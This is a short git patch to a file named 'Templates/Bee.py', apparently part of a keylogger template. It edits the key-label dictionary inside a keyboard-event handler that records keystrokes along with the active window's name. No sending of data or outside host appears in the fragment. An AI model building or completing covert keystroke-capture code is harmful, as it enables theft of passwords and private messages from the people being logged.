From fcb135d13babfb72748dc1bc47331486f92ae02f Mon Sep 17 00:00:00 2001 From: MasloLot <53411004+MasloLot@users.noreply.github.com> Date: Mon, 29 Jul 2019 00:03:38 +0200 Subject: [PATCH] Update Bee.py --- Templates/Bee.py | 36 ++++++++++++++++++------------------ 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/Templates/Bee.py b/Templates/Bee.py index 25239d5..572bf37 100644 --- a/Templates/Bee.py +++ b/Templates/Bee.py @@ -69,24 +69,24 @@ def pushing(event): global data, lastWindow window = event.WindowName keys = { - 13: ' [ENTER] ', - 8: ' [BACKSPACE] ', - 162: ' [CTRL] ', - 163: ' [CTRL] ', - 164: ' [ALT] ', - 165: ' [ALT] ', - 160: ' [SHIFT] ', - 161: ' [SHIFT] ', - 46: ' [DELETE] ', - 32: ' [SPACE] ', - 27: ' [ESC] ', - 9: ' [TAB] ', - 20: ' [CAPSLOCK] ', - 38: ' [UP] ', - 40: ' [DOWN] ', - 37: ' [LEFT] ', - 39: ' [RIGHT] ', - 91: ' [SUPER] ' + 13: ' ', + 8: ' ', + 162: ' ', + 163: ' ', + 164: ' ', + 165: ' ', + 160: ' ', + 161: ' ', + 46: ' ', + 32: ' ', + 27: ' ', + 9: ' ', + 20: ' ', + 38: ' ', + 40: ' ', + 37: ' ', + 39: ' ', + 91: ' ' } keyboardKeyName = keys.get(event.Ascii, chr(event.Ascii)) if window != lastWindow: